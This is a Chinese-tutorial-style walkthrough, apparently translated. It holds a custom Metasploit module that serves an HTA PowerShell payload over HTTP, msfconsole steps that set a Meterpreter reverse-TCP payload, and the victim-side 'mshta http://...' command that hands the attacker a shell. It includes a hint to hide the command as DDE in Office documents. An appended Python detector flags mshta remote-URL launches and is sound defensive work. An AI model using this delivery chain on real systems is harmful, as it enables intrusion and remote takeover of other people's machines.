Kali System Preparation:
Save the following Ruby code as /usr/share/metasploit-framework/modules/exploits/windows/smb/msh_shell.rb (mind the code indentation):
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'Microsoft Office Payload Delivery',
      'Description'   => %q{
        This module generates an command to place within a Word document,
        that when executed, would retrieve a HTA payload via HTTP from a
        Web server. Currently has not figured out how to generate a doc.
      },
      'License'       => MSF_LICENSE,
      'Arch'          => ARCH_X86,
      'Platform'      => 'win',
      'Targets'       =>
        [
          ['Automatic', {}],
        ],
      'DefaultTarget' => 0,
    ))
  end

  def on_request_uri(cli, _request)
    print_status("Delivering payload")
    p = regenerate_payload(cli)
    data = Msf::Util::EXE.to_executable_fmt(
      framework,
      ARCH_X86,
      'win',
      p.encoded,
      'hta-psh',
      { :arch => ARCH_X86, :platform => 'win' }
    )
    send_response(cli, data, 'Content-Type' => 'application/hta')
  end

  def primer
    url = get_uri
    print_status("Place the following DDE in an MS document:")
    print_line("mshta.exe \"#{url}\"")
  end
end
Start the PostgreSQL service used by MSF from the command line:
service postgresql start
Then start MSF:
sudo msfconsole
Reload all modules:
reload_all
Find the msh_shell module we just created:
search msh_shell
Load this module:
use exploit/windows/smb/msh_shell
Use a reverse-shell payload, then configure the local address and the URI path:
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.105
set URIPATH aaaa
exploit
Windows System:
Open the Run command and execute:
mshta http://<Kali system IP>/aaaa
The Kali system will receive a shell from the Windows system.
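The same chain seen from the defender's side, as an added example that is not part of the original page: a Python check over process-creation events (Sysmon Event ID 1 style fields) that flags mshta.exe given a remote URL, an Office parent (the module's own hint mentions placing the command in an MS document), and the script host that an hta-psh payload spawns. The sample events, the parent and child process lists, and all function names are constructed for illustration.

```python
import ntpath
import re

# A remote http(s) URL passed as an argument, quoted or not, in any letter case.
REMOTE_URL = re.compile(r"""(?i)(?:^|[\s"'])(https?://[^\s"']+)""")
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}  # assumed list
SCRIPT_CHILDREN = {"powershell.exe", "cmd.exe"}                               # assumed list

# Constructed process-creation events; not real logs.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta http://192.0.2.10/aaaa"},
    {"Image": r"C:\Windows\SysWOW64\mshta.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "CommandLine": 'mshta.exe "HTTPS://example.test/x.hta"'},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'mshta.exe "C:\Tools\inventory.hta"'},       # local HTA: not flagged
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad http://192.0.2.10/aaaa.txt"},        # URL, but not mshta
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell.exe <constructed arguments>"},
]

def _name(path):
    """Lower-cased file name of a Windows path (empty string if the field is missing)."""
    return ntpath.basename(path or "").lower()

def findings(event):
    """Return the reasons one event matches the mshta delivery chain (empty list if none)."""
    image, parent = _name(event.get("Image")), _name(event.get("ParentImage"))
    reasons = []
    if image == "mshta.exe":
        match = REMOTE_URL.search(event.get("CommandLine", ""))
        if match:
            reasons.append("mshta-remote-url:" + match.group(1))
            if parent in OFFICE_PARENTS:
                reasons.append("office-parent:" + parent)
    elif parent == "mshta.exe" and image in SCRIPT_CHILDREN:
        reasons.append("mshta-spawned:" + image)
    return reasons

def detect(events):
    """Return (index, reasons) for every event with at least one finding."""
    return [(i, r) for i, e in enumerate(events) if (r := findings(e))]

if __name__ == "__main__":
    for index, reasons in detect(SAMPLE_EVENTS):
        print(index, reasons)
```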